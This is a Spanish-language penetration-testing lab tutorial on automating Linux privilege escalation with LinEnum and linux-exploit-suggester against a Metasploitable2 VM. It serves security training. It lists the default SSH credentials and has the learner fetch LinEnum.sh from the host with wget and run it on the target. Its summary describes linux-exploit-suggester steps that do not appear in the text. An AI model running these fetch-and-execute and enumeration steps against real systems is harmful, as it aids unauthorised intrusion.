Introducción
En este laboratorio, exploraremos dos de las herramientas de automatización de escalada de privilegios en Linux más utilizadas: LinEnum y linux-exploit-suggester. El objetivo es aprender a aprovechar eficazmente estas herramientas para acelerar el proceso de escalada de privilegios durante una prueba de penetración o una evaluación de seguridad. Dominar estas herramientas puede ahorrar significativamente tiempo y esfuerzo, lo que te permitirá centrarte en comprender los principios y metodologías subyacentes de la escalada de privilegios.
Configuración del entorno
En este paso, configuraremos la máquina virtual Metasploitable2, que servirá como nuestro sistema objetivo. Siga las instrucciones a continuación para iniciar la máquina virtual y establecer una conexión:
En nuestro entorno de laboratorio, la configuración de la máquina virtual Metasploitable2 ya ha sido preconfigurada. Puede iniciar la máquina virtual y conectarse a ella utilizando los siguientes pasos:
Abra una terminal y ejecute el siguiente comando para iniciar la máquina virtual Metasploitable2:
sudo virsh start Metasploitable2Espere de 1 a 2 minutos hasta que la máquina virtual se haya arrancado completamente y esté lista.
Verifique que puede hacer ping a la dirección IP de Metasploitable2 (192.168.122.102) desde su máquina host.
Utilice el siguiente comando para conectarse a la máquina virtual Metasploitable2 a través de SSH:
ssh msfadmin@192.168.122.102En la primera conexión, se le pedirá que acepte la autenticidad del host. Escriba
yesy presioneEnterpara continuar.Luego, ingrese la contraseña de
msfadmincuando se le solicite:msfadmin
Después de una autenticación exitosa, debería tener una sesión de shell con privilegios bajos en la máquina virtual Metasploitable2.
LinEnum: Automatización de la enumeración de sistemas Linux
LinEnum es un potente script que automatiza el proceso de enumeración en un sistema Linux, recopilando información valiosa que puede ayudar en el proceso de escalada de privilegios. Siga los pasos a continuación para utilizar LinEnum en la máquina virtual Metasploitable2:
En su máquina host, abra una terminal y navegue hasta el directorio
/tmp:cd /tmpHay un script llamado
LinEnum.shen el directorio/tmpdel proyecto.Inicie un servidor HTTP de Python en el directorio
/tmppara alojar el script LinEnum:python3 -m http.server 8000En la
Máquina Virtual Metasploitable2, navegue hasta el directorio/tmpy descargue el script LinEnum utilizandowgetdesde el servidor HTTP de Python que se está ejecutando en su máquina host:Navegue hasta el directorio
/tmp:cd /tmpwget 192.168.122.1:8000/LinEnum.sh -P /tmpHaga que el script LinEnum sea ejecutable:
chmod +x LinEnum.shEjecute el script LinEnum y redirija la salida a un archivo para su posterior análisis:
LinEnum.sh > linenum_output.txt
LinEnum realizará varias comprobaciones y enumerará la información del sistema, resaltando posibles vulnerabilidades o malas configuraciones en texto amarillo. Presta mucha atención a estas áreas resaltadas, ya que pueden revelar oportunidades para la escalada de privilegios.
Resumen
En este laboratorio, aprendimos cómo utilizar dos potentes herramientas de automatización, LinEnum y linux-exploit-suggester, para asistir en el proceso de escalada de privilegios en sistemas Linux. LinEnum proporciona una enumeración exhaustiva de la información del sistema, destacando posibles vulnerabilidades y malas configuraciones. La herramienta linux-exploit-suggester analiza la versión del kernel y sugiere exploits de kernel relevantes que podrían conducir a la escalada de privilegios.
Al aprovechar estas herramientas, podemos optimizar las fases de recopilación y análisis de información, ahorrando tiempo valioso durante una prueba de penetración o una evaluación de seguridad. Sin embargo, es fundamental entender que estas herramientas están destinadas a ayudar en el proceso, y una sólida comprensión de las técnicas y metodologías de escalada de privilegios sigue siendo esencial para una explotación exitosa.
A lo largo de este laboratorio, practicamos la configuración de un entorno de máquina virtual vulnerable, la descarga y ejecución de los scripts LinEnum y linux-exploit-suggester, y la interpretación de sus salidas. La experiencia práctica adquirida en este laboratorio será invaluable en escenarios del mundo real, donde la escalada de privilegios eficiente y efectiva es una habilidad crítica para hackers éticos y profesionales de seguridad.